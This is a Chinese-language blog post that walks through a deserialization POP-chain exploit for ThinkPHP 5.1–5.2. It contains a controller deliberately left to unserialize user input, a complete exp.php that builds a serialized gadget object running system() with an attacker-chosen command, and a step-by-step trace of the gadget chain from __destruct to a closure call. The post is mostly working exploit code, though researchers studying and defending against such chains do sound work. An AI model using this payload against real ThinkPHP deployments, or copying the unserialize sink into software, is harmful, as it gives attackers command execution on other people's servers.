0%

ThinkPHP 5.1-5.2 pop链学习

Posted on Edited on

搭建

composer create-project topthink/think=5.2.x-dev –prefer-dist v5.2

改一下Index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
namespace app\controller;

class Index
{
    public function index()
    {
       ……
    }

    public function hello($name = 'ThinkPHP5')
    {
        return 'hello,' . $name;
    }

    public function test(){
        echo 'unserialize';
    @unserialize($_GET["payload"]);
    }
}

exp.php 通吃5.1 5.2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php
namespace think\process\pipes {
    use think\model\Pivot;

    class Windows
    {
        private $files;
        public function __construct()
        {
            $this->files = [new Pivot()];
        }
    }
}

namespace think {
    abstract class Model
    {
        private $data=array("pwn" => "gnome-terminal");
        private $withAttr = array("pwn" => "system");
    }
}

namespace think\model {
    use think\Model;
    class Pivot extends Model
    {
    }

    use think\model\Pivot;
    use think\process\pipes\Windows;
    $Conver = new Windows();
}

namespace {
    @unlink("phar.xml");
    //$phar = new Phar("phar.phar");
    //$phar->startBuffering();
    //$phar->setMetadata($Conver);
    //$phar->addFromString("test.txt", "test");
    //$phar->stopBuffering();
    echo urlencode(serialize($Conver));
    //rename("phar.phar","phar.xml");
}
?>

能弹出gnome的计算器

分析

WIndows.php

1
2
3
4
5
public function __destruct()
{
    $this->close();
    $this->removeFiles();
}

removeFiles

1
2
3
4
5
6
7
8
private function removeFiles()
{
    foreach ($this->files as $filename) {
        if (file_exists($filename)) {
            @unlink($filename);
        }
    }
}

file_exists->__toString->toJson->toArray()

$data = array_merge($this->data, $this->relation);

$this->data = [“tinmin” => “gnome-terminal”]

1
2
3
elseif (!isset($this->hidden[$key]) && !$hasVisible) {
    $item[$key] = $this->getAttr($key);
}

getAttr->getData->getRealFieldName

getAttr返回

1
return $this->getValue($name, $value, $relation);

$name = “tinmin” $value = “gnome-terminal”
getValue

1
2
3
4
5
6
7
8
9
10
11
12
13
protected function getValue(string $name, $value, bool $relation = false)
{
    // 检测属性获取器
    $fieldName = $this->getRealFieldName($name);
    $method    = 'get' . App::parseName($name, 1) . 'Attr';

    if (isset($this->withAttr[$fieldName])) {
        if ($relation) {
            $value = $this->getRelationValue($name);
        }

        $closure = $this->withAttr[$fieldName];
        $value   = $closure($value, $this->data);

$closure = “system” $value = “gnome-terminal”

命令执行了

最终是

1
2
3
php > $a = array("tinmin" => "ls");
php > system("whoami",$a);
tinmin